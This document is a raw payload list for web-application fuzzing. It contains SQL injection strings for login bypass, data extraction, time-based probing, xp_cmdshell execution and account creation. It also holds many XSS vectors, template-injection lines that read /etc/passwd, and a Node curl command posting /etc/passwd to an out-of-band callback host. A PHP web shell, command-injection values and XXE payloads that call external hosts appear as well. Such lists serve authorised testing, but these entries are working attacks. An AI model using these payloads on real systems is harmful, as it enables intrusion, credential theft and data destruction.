'-' | |
' ' | |
'&' | |
'^' | |
'*' | |
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'> | |
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" | |
onmouseover=/*<svg/*/onload=alert()//> | |
' or ''-' | |
' or '' ' | |
' or ''&' | |
%00%01%02%03%04%05%06%07%08%09%0a%0b%0c%0d%0e%0f%10%11%12%13%14%15%16%17%18%19%1a%1b%1c%1d%1e%1f%20%21%22%23%24%25%26%27%28%29%2a%2b%2c%2d%2e%2f%30%31%32%33%34%35%36%37%38%39%3a%3b%3c%3d%3e%3f%40%41%42%43%44%45%46%47%48%49%4a%4b%4c%4d%4e%4f%50%51%52%53%54%55%56%57%58%59%5a%5b%5c%5d%5e%5f%60%61%62%63%64%65%66%67%68%69%6a%6b%6c%6d%6e%6f%70%71%72%73%74%75%76%77%78%79%7a%7b%7c%7d%7e%7f%80%81%82%83%84%85%86%87%88%89%8a%8b%8c%8d%8e%8f%90%91%92%93%94%95%96%97%98%99%9a%9b%9c%9d%9e%9f%a0%a1%a2%a3%a4%a5%a6%a7%a8%a9%aa%ab%ac%ad%ae%af%b0%b1%b2%b3%b4%b5%b6%b7%b8%b9%ba%bb%bc%bd%be%bf%c0%c1%c2%c3%c4%c5%c6%c7%c8%c9%ca%cb%cc%cd%ce%cf%d0%d1%d2%d3%d4%d5%d6%d7%d8%d9%da%db%dc%dd%de%df%e0%e1%e2%e3%e4%e5%e6%e7%e8%e9%ea%eb%ec%ed%ee%ef%f0%f1%f2%f3%f4%f5%f6%f7%f8%f9%fa%fb%fc%fd%fe%ff | |
' or ''^' | |
$collabplz | |
http://$collabplz | |
...- .. .-. - ..- .- .-.. / . ...- . -. - /.-- . -.. -. . ... -.. .- -.-- / ..--- --... / --- -.-. - --- -... . .-. /-... .--. / .--. .-. . ... . -. - ... ---... / -.. .-. / -.. .- ...- .. -.. / .- -... .-. ..- - .- - /-... . / - .... . .-. . -.-.-- | |
https://$collabplz | |
{{url_for.__globals__}} | |
{{request.environ}} | |
{"1":["%01","<\\?php $a = $_REQUEST\\['r'];$output = `$a`;ec\\ho $output;?>"]} | |
{{config}} | |
`{{url_for.__globals__.__builtins__.open('/etc/passwd').read()}}` | |
{{self}} | |
{{request|attr('__class__')}} | |
℀ | |
℁ | |
℅ | |
℆ | |
℀℁℅℆ | |
request|attr('__class__') == request.__class__ == request[\x5f\x5fclass\x5f\x5f] | |
ftp://$collabplz | |
</script>injected2<script>alert(1)//</script> | |
//$collabplz | |
\\$collabplz | |
smtp://$collabplz | |
+http://$collabplz+ | |
0://$collabplz:80;http://google.com:80/ | |
file://$collabplz | |
dict://$collabplz | |
sftp://$collabplz | |
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ | |
tftp://$collabplz | |
ldap://$collabplz | |
gopher://$collabplz | |
file:///etc/passwd | |
</script><script>alert(1)</script> | |
<style>/*</style><img src onerror=alert(1)>*/ | |
' or ''*' | |
"-" | |
" " | |
"&" | |
"^" | |
"*" | |
<esi:include src="http://$collabplz/" /><script>alert(1)</script> | |
" or ""-" | |
" or "" " | |
" or ""&" | |
" or ""^" | |
%00%00 | |
%00 | |
%00%0a%0d | |
%0d%0a%00 | |
%00%0d%0a | |
%00%00%00%00%00%00%00%00%00%00%00%00 | |
" or ""*" | |
or true-- | |
" or true-- | |
' or true-- | |
") or true-- | |
') or true-- | |
' or 'x'='x | |
') or ('x')=('x | |
1+and+exists(select+*+from+fn_trace_gettable('\\'%2b(select+pass+from+users+where+id=1)%2b'.$collabplz\1.trc',default)) | |
1+and+exists(select+*+from+fn_trace_gettable('\\'%2baaaaa%2b'.$collabplz\1.trc',default)) | |
test+(<script>alert(0)</script>)@example.com | |
test@example(<script>alert(0)</script>).com | |
"<script>alert(0)</script>"@example.com | |
"<%=7*7%>"@example.com | |
test+(${{7*7}}@example.com | |
{{$a=7*7}} | |
"'OR1=1--'"@example.com | |
"mail');SLEEP+5;--"@example.com | |
test.test@[$collabplz] | |
test.test@[127.0.0.1] | |
victim&email=attacker@example.com | |
')) or (('x'))=(('x | |
";id;" | |
';id;' | |
c%3A..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fpath_traversal | |
"|id|" | |
'|id|' | |
"|/usr/bin/id|" | |
'|/usr/bin/id|' | |
"||/usr/bin/id|" | |
'||/usr/bin/id|' | |
"\n/bin/ls -al\n" | |
'\n/bin/ls -al\n' | |
%22%0A/usr/bin/id%0A%22 | |
%27%0A/usr/bin/id%0A%27 | |
"& ping -i 30 127.0.0.1 &" | |
'& ping -i 30 127.0.0.1 &' | |
"& ping -i 30 $collabplz &" | |
'& ping -i 30 $collabplz &' | |
" or "x"="x | |
") or ("x")=("x | |
<x v-html=_c.constructor('alert(1)')()> | |
")) or (("x"))=(("x | |
or 1=1 | |
or 1=1-- | |
or 1=1# | |
or 1=1/* | |
admin' -- | |
admin' # | |
admin'/* | |
admin' or '1'='1 | |
https://$collabplz</script><script>{{a=root.process.mainModule.require('child_process').exec('curl -F \"x=`cat /etc/passwd`\" $collabplz')}}</script> | |
admin' or '1'='1'-- | |
admin' or '1'='1'# | |
admin' or '1'='1'/* | |
admin'or 1=1 or ''=' | |
admin' or 1=1 | |
${7*191} | |
${{7*191}} | |
{{7*191}} | |
<%= 7 * 191 %> | |
#{7*191} | |
{{7*'191'}} | |
{{7*191}}[[7*191]] | |
@(7*191) | |
admin' or 1=1-- | |
admin' or 1=1# | |
admin' or 1=1/* | |
admin') or ('1'='1 | |
admin') or ('1'='1'-- | |
admin') or ('1'='1'# | |
admin') or ('1'='1'/* | |
admin') or '1'='1 | |
admin') or '1'='1'-- | |
admin') or '1'='1'# | |
admin') or '1'='1'/* | |
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 | |
admin" -- | |
admin" # | |
admin"/* | |
admin" or "1"="1 | |
admin" or "1"="1"-- | |
admin" or "1"="1"# | |
<\\?php $a = $_REQUEST\\['r'];$output = `$a`;ec\\ho $output;?> | |
admin" or "1"="1"/* | |
admin"or 1=1 or ""=" | |
admin" or 1=1 | |
admin" or 1=1-- | |
admin" or 1=1# | |
admin" or 1=1/* | |
admin") or ("1"="1 | |
admin") or ("1"="1"-- | |
admin") or ("1"="1"# | |
admin") or ("1"="1"/* | |
admin") or "1"="1 | |
admin") or "1"="1"-- | |
admin") or "1"="1"# | |
admin") or "1"="1"/* | |
X-Custom-IP-Authorization | |
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 | |
== | |
= | |
</textarea></script><script>thr=new XMLHttpRequest();thr.open(‘GET’,’http://$collabplz/a'+document.location,true);thr.send(null);</script> | |
' | |
' -- | |
' # | |
' – | |
'-- | |
'/* | |
'# | |
" -- | |
" # | |
"/* | |
' and 1='1 | |
<%= system('cat /etc/passwd') %> | |
<%= `ls /` %> | |
<%= IO.popen('ls /').readlines() %> | |
<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%> | |
<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%> | |
' and a='a | |
or 1=1 | |
or true | |
' or ''=' | |
" or ""=" | |
1′) and '1′='1– | |
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055 | |
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055 | |
{{define "T1"}}<script>alert(1)</script>{{end}} {{template "T1"}}` | |
and 1=1 | |
and 1=1– | |
' and 'one'='one | |
' and 'one'='one– | |
' group by password having 1=1-- | |
' group by userid having 1=1-- | |
' group by username having 1=1-- | |
like '%' | |
or 0=0 -- | |
or 0=0 # | |
or 0=0 – | |
' or 0=0 # | |
' or 0=0 -- | |
' or 0=0 # | |
' or 0=0 – | |
" or 0=0 -- | |
" or 0=0 # | |
" or 0=0 – | |
%' or '0'='0 | |
or 1=1 | |
or 1=1-- | |
or 1=1/* | |
or 1=1# | |
or 1=1– | |
' or 1=1-- | |
' or '1'='1 | |
' or '1'='1'-- | |
' or '1'='1'/* | |
' or '1'='1'# | |
' or '1′='1 | |
' or 1=1 | |
' or 1=1 -- | |
' or 1=1 – | |
' or 1=1-- | |
' or 1=1;# | |
' or 1=1/* | |
' or 1=1# | |
' or 1=1– | |
') or '1'='1 | |
') or '1'='1-- | |
') or '1'='1'-- | |
') or '1'='1'/* | |
') or '1'='1'# | |
') or ('1'='1 | |
') or ('1'='1-- | |
') or ('1'='1'-- | |
') or ('1'='1'/* | |
{{{}.")));alert(1)//"}} | |
') or ('1'='1'# | |
'or'1=1 | |
'or'1=1′ | |
" or "1"="1 | |
" or "1"="1"-- | |
" or "1"="1"/* | |
" or "1"="1"# | |
" or 1=1 | |
" or 1=1 -- | |
" or 1=1 – | |
" or 1=1-- | |
" or 1=1/* | |
" or 1=1# | |
" or 1=1– | |
") or "1"="1 | |
") or "1"="1"-- | |
") or "1"="1"/* | |
") or "1"="1"# | |
") or ("1"="1 | |
") or ("1"="1"-- | |
") or ("1"="1"/* | |
") or ("1"="1"# | |
) or '1′='1– | |
) or ('1′='1– | |
' or 1=1 LIMIT 1;# | |
'or 1=1 or ''=' | |
"or 1=1 or ""=" | |
' or 'a'='a | |
' or a=a-- | |
' or a=a– | |
') or ('a'='a | |
" or "a"="a | |
") or ("a"="a | |
') or ('a'='a and hi") or ("a"="a | |
' or 'one'='one | |
' or 'one'='one– | |
' or uid like '% | |
' or uname like '% | |
' or userid like '% | |
' or user like '% | |
' or username like '% | |
' or 'x'='x | |
') or ('x'='x | |
" or "x"="x | |
' OR 'x'='x'#; | |
'=' 'or' and '=' 'or' | |
' UNION ALL SELECT 1, @@version;# | |
' UNION ALL SELECT system_user(),user();# | |
' UNION select table_schema,table_name FROM information_Schema.tables;# | |
admin' and substring(password/text(),1,1)='7 | |
' and substring(password/text(),1,1)='7 | |
' or 1=1 limit 1 -- -+ | |
'="or' | |
alert`1` | |
alert(1) | |
alert(1) | |
alert(1) | |
(alert)(1) | |
a=alert,a(1) | |
[1].find(alert) | |
top["al"+"ert"](1) | |
top[/al/.source+/ert/.source](1) | |
al\u0065rt(1) | |
top['al\145rt'](1) | |
top['al\x65rt'](1) | |
http(s)://.../?locals[system("ls")] | |
http(s)://.../?locals[system("wget http://$collabplz")] | |
http(s)://.../?locals[system("host $collabplz ")] | |
top[8680439..toString(30)](1) | |
navigator.vibrate(500) | |
eval(URL.slice(-8))>#alert(1) | |
eval(location.hash.slice(1)>#alert(1) | |
innerHTML=location.hash>#<script>alert(1)</script> | |
<svg onload=alert(1)> | |
"><svg onload=alert(1)// | |
"onmouseover=alert(1)// | |
"autofocus/onfocus=alert(1)// | |
'-alert(1)-' | |
'-alert(1)// | |
\'-alert(1)// | |
</script><svg onload=alert(1)> | |
<x contenteditable onblur=alert(1)>lose focus! | |
<x onclick=alert(1)>click this! | |
<x oncopy=alert(1)>copy this! | |
<x oncontextmenu=alert(1)>right click this! | |
<x oncut=alert(1)>copy this! | |
<x ondblclick=alert(1)>double click this! | |
<x ondrag=alert(1)>drag this! | |
<x contenteditable onfocus=alert(1)>focus this! | |
<x contenteditable oninput=alert(1)>input here! | |
<x contenteditable onkeydown=alert(1)>press any key! | |
<x contenteditable onkeypress=alert(1)>press any key! | |
<x contenteditable onkeyup=alert(1)>press any key! | |
<x onmousedown=alert(1)>click this! | |
<x onmousemove=alert(1)>hover this! | |
<x onmouseout=alert(1)>hover this! | |
<x onmouseover=alert(1)>hover this! | |
<x onmouseup=alert(1)>click this! | |
<x contenteditable onpaste=alert(1)>paste here! | |
<script>alert(1)// | |
<script>alert(1)<!– | |
<script src=//brutelogic.com.br/1.js> | |
<script src=//3334957647/1> | |
%3Cx onxxx=alert(1) | |
<%78 onxxx=1 | |
<x %6Fnxxx=1 | |
<x o%6Exxx=1 | |
<x on%78xx=1 | |
<x onxxx%3D1 | |
<X onxxx=1 | |
<x OnXxx=1 | |
<X OnXxx=1 | |
<x onxxx=1 onxxx=1 | |
<x/onxxx=1 | |
<x%09onxxx=1 | |
<x%0Aonxxx=1 | |
<x%0Conxxx=1 | |
<x%0Donxxx=1 | |
<x%2Fonxxx=1 | |
<x 1='1'onxxx=1 | |
<x 1="1"onxxx=1 | |
<x </onxxx=1 | |
<x 1=">" onxxx=1 | |
<http://onxxx%3D1/ | |
<x onxxx=alert(1) 1=' | |
<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)> | |
'onload=alert(1)><svg/1=' | |
'>alert(1)</script><script/1=' | |
{{[]."-alert`1`-"}} | |
*/alert(1)</script><script>/* | |
*/alert(1)">'onload="/*<svg/1=' | |
`-alert(1)">'onload="`<svg/1=' | |
\\\\$collabplz\share | |
*/</script>'>alert(1)/*<script/1=' | |
<script>alert(1)</script> | |
<script src=javascript:alert(1)> | |
<iframe src=javascript:alert(1)> | |
<embed src=javascript:alert(1)> | |
<a href=javascript:alert(1)>click | |
<math><brute href=javascript:alert(1)>click | |
<form action=javascript:alert(1)><input type=submit> | |
<isindex action=javascript:alert(1) type=submit value=click> | |
<form><button formaction=javascript:alert(1)>click | |
<form><input formaction=javascript:alert(1) type=submit value=click> | |
<form><input formaction=javascript:alert(1) type=image value=click> | |
<form><input formaction=javascript:alert(1) type=image src=SOURCE> | |
<isindex formaction=javascript:alert(1) type=submit value=click> | |
<object data=javascript:alert(1)> | |
<iframe srcdoc=<svg/onload=alert(1)>> | |
<svg><script xlink:href=data:,alert(1) /> | |
<math><brute xlink:href=javascript:alert(1)>click | |
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&> | |
<html ontouchstart=alert(1)> | |
<html ontouchend=alert(1)> | |
<html ontouchmove=alert(1)> | |
<html ontouchcancel=alert(1)> | |
<body onorientationchange=alert(1)> | |
"><img src=1 onerror=alert(1)>.gif | |
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> | |
%n%n%n%n%n | |
%999999999c | |
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//; | |
<script src="data:,alert(1)// | |
"><script src=data:,alert(1)// | |
<script src="//brutelogic.com.br/1.js# | |
"><script src=//brutelogic.com.br/1.js# | |
<link rel=import href="data:text/html,<script>alert(1)</script> | |
"><link rel=import href=data:text/html,<script>alert(1)</script> | |
<base href=//0> | |
<script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1) | |
<body onload=alert(1)> | |
<body onpageshow=alert(1)> | |
<body onfocus=alert(1)> | |
<body onhashchange=alert(1)><a href=#x>click this!#x | |
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x | |
<body onscroll=alert(1)><br><br><br><br> | |
<body onresize=alert(1)>press F12! | |
<body onhelp=alert(1)>press F1! (MSIE) | |
<marquee onstart=alert(1)> | |
https://attacker.com</script><script>{{a=root.process.mainModule.require('child_process').exec('curl -F \"x=`cat /etc/passwd`\" $collabplz')}}</script> | |
<marquee loop=1 width=0 onfinish=alert(1)> | |
<audio src onloadstart=alert(1)> | |
<video onloadstart=alert(1)><source> | |
<input autofocus onblur=alert(1)> | |
<keygen autofocus onfocus=alert(1)> | |
<form onsubmit=alert(1)><input type=submit> | |
<select onchange=alert(1)><option>1<option>2 | |
<menu id=x contextmenu=x onshow=alert(1)>right click me! | |
/usr/pkg/etc/httpd/httpd.conf | |
/usr/local/etc/apache22/httpd.conf | |
/usr/local/etc/apache2/httpd.conf | |
/var/www/conf/httpd.conf | |
/var/www/logs/error_log | |
/var/www/logs/access_log | |
/etc/apache2/httpd2.conf | |
/var/apache2/logs/error_log | |
/var/apache2/logs/access_log | |
/var/log/httpd-error.log | |
/var/log/httpd-access.log | |
{{[''.constructor.prototype.charAt=[].join]|orderBy:'x=1} } };alert(1)//'}} | |
/var/log/httpd/error_log | |
/var/log/httpd/access_log waitfor delay '0:0:20' /* | |
waitfor delay '0:0:20' -- | |
' waitfor delay '0:0:20' /* | |
' waitfor delay '0:0:20' -- | |
" waitfor delay '0:0:20' /* | |
" waitfor delay '0:0:20' -- | |
) waitfor delay '0:0:20' /* | |
) waitfor delay '0:0:20' -- | |
)) waitfor delay '0:0:20' /* | |
)) waitfor delay '0:0:20' -- | |
))) waitfor delay '0:0:20' /* | |
))) waitfor delay '0:0:20' -- | |
)))) waitfor delay '0:0:20' /* | |
)))) waitfor delay '0:0:20' -- | |
))))) waitfor delay '0:0:20' -- | |
)))))) waitfor delay '0:0:20' -- | |
') waitfor delay '0:0:20' /* | |
') waitfor delay '0:0:20' -- | |
") waitfor delay '0:0:20' /* | |
") waitfor delay '0:0:20' -- | |
')) waitfor delay '0:0:20' /* | |
')) waitfor delay '0:0:20' -- | |
")) waitfor delay '0:0:20' /* | |
")) waitfor delay '0:0:20' -- | |
'))) waitfor delay '0:0:20' /* | |
'))) waitfor delay '0:0:20' -- | |
"))) waitfor delay '0:0:20' /* | |
"))) waitfor delay '0:0:20' -- | |
')))) waitfor delay '0:0:20' /* | |
')))) waitfor delay '0:0:20' -- | |
")))) waitfor delay '0:0:20' /* | |
")))) waitfor delay '0:0:20' -- | |
'))))) waitfor delay '0:0:20' /* | |
'))))) waitfor delay '0:0:20' -- | |
"))))) waitfor delay '0:0:20' /* | |
"))))) waitfor delay '0:0:20' -- | |
')))))) waitfor delay '0:0:20' /* | |
')))))) waitfor delay '0:0:20' -- | |
")))))) waitfor delay '0:0:20' /* | |
")))))) waitfor delay '0:0:20' --# you will need to customize/modify some of the values in the queries for best effect | |
'; exec master..xp_cmdshell 'ping 10.10.1.2'-- | |
'create user name identified by 'pass123' -- | |
'create user name identified by pass123 temporary tablespace temp default tablespace users; | |
' ; drop table temp -- | |
'exec sp_addlogin 'name' , 'password' -- | |
' exec sp_addsrvrolemember 'name' , 'sysadmin' -- | |
' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -- | |
' grant connect to name; grant resource to name; -- | |
' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) | |
' or 1=1 -- | |
' union (select @@version) -- | |
' union (select NULL, (select @@version)) -- | |
' union (select NULL, NULL, (select @@version)) -- | |
' union (select NULL, NULL, NULL, (select @@version)) -- | |
' union (select NULL, NULL, NULL, NULL, (select @@version)) -- | |
' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- | |
# ms-sqli info disclosure payload fuzzfile | |
# replace regex with your fuzzer for best results <attackerip> <sharename> | |
# run wireshark or tcpdump, look for incoming smb or icmp packets from victim | |
# might need to terminate payloads with ;-- | |
select @@version | |
select @@servernamee | |
select @@microsoftversione | |
select * from master..sysserverse | |
select * from sysusers | |
exec master..xp_cmdshell 'ipconfig+/all' | |
exec master..xp_cmdshell 'net+view' | |
exec master..xp_cmdshell 'net+users' | |
exec master..xp_cmdshell 'ping+<attackerip>' | |
BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat' | |
create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'" select * from myfile"-- | |
1'1 | |
1 exec sp_ (or exec xp_) | |
1 and 1=1 | |
1' and 1=(select count(*) from tablenames); -- | |
1 or 1=1 | |
1' or '1'='1 | |
and 0=benchmark(3000000,MD5(1))%20/* | |
and 0=benchmark(3000000,MD5(1))%20-- | |
and 0=benchmark(3000000,MD5(1))%20%23 | |
' and 0=benchmark(3000000,MD5(1))%20/* | |
' and 0=benchmark(3000000,MD5(1))%20-- | |
' and 0=benchmark(3000000,MD5(1))%20%23 | |
" and 0=benchmark(3000000,MD5(1))%20/* | |
" and 0=benchmark(3000000,MD5(1))%20-- | |
" and 0=benchmark(3000000,MD5(1))%20%23 | |
) and 0=benchmark(3000000,MD5(1))%20/* | |
) and 0=benchmark(3000000,MD5(1))%20-- | |
) and 0=benchmark(3000000,MD5(1))%20%23 | |
)) and 0=benchmark(3000000,MD5(1))%20/* | |
)) and 0=benchmark(3000000,MD5(1))%20-- | |
)) and 0=benchmark(3000000,MD5(1))%20%23 | |
))) and 0=benchmark(3000000,MD5(1))%20/* | |
))) and 0=benchmark(3000000,MD5(1))%20-- | |
))) and 0=benchmark(3000000,MD5(1))%20%23 | |
)))) and 0=benchmark(3000000,MD5(1))%20/* | |
)))) and 0=benchmark(3000000,MD5(1))%20-- | |
)))) and 0=benchmark(3000000,MD5(1))%20%23 | |
') and 0=benchmark(3000000,MD5(1))%20/* | |
') and 0=benchmark(3000000,MD5(1))%20-- | |
') and 0=benchmark(3000000,MD5(1))%20%23 | |
") and 0=benchmark(3000000,MD5(1))%20/* | |
") and 0=benchmark(3000000,MD5(1))%20-- | |
") and 0=benchmark(3000000,MD5(1))%20%23 | |
')) and 0=benchmark(3000000,MD5(1))%20/* | |
')) and 0=benchmark(3000000,MD5(1))%20-- | |
')) and 0=benchmark(3000000,MD5(1))%20%23 | |
")) and 0=benchmark(3000000,MD5(1))%20/* | |
")) and 0=benchmark(3000000,MD5(1))%20-- | |
")) and 0=benchmark(3000000,MD5(1))%20%23 | |
'))) and 0=benchmark(3000000,MD5(1))%20/* | |
'))) and 0=benchmark(3000000,MD5(1))%20-- | |
'))) and 0=benchmark(3000000,MD5(1))%20%23 | |
"))) and 0=benchmark(3000000,MD5(1))%20/* | |
"))) and 0=benchmark(3000000,MD5(1))%20-- | |
"))) and 0=benchmark(3000000,MD5(1))%20%23 | |
')))) and 0=benchmark(3000000,MD5(1))%20/* | |
')))) and 0=benchmark(3000000,MD5(1))%20-- | |
')))) and 0=benchmark(3000000,MD5(1))%20%23 | |
")))) and 0=benchmark(3000000,MD5(1))%20/* | |
")))) and 0=benchmark(3000000,MD5(1))%20-- | |
")))) and 0=benchmark(3000000,MD5(1))%20%23# mysql local file disclosure through sqli | |
# fuzz interesting absolute filepath/filename into <filepath> | |
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile; | |
# contains statements from jbrofuzz | |
’ or ‘1’=’1 | |
' or '1'='1 | |
'||utl_http.request('httP://192.168.1.1/')||' | |
' || myappadmin.adduser('admin', 'newpass') || ' | |
' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.$collabplz/"><x /> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.$collabplz/"><x /> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.$collabplz/">]><x>&xxe;</x> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.$collabplz/">]><x>&xxe;</x> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.$collabplz/">%xxe;]><x/> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.$collabplz/">%xxe;]><x/> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.$collabplz/"/> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://xxe-xsi-nonamespaceschemalocation.$collabplz/"/> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"><xs:include schemaLocation="http://xxe-xsinclude-schemalocation.$collabplz/"/></xs:schema> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"><xs:include namespace="http://xxe-xsinclude-namespace.$collabplz/"/></xs:schema> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"><xs:import schemaLocation="http://xxe-xsimport-schemalocation.$collabplz/"/></xs:schema> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"><xs:import namespace="http://xxe-xsimport-namespace.$collabplz/"/></xs:schema> | |
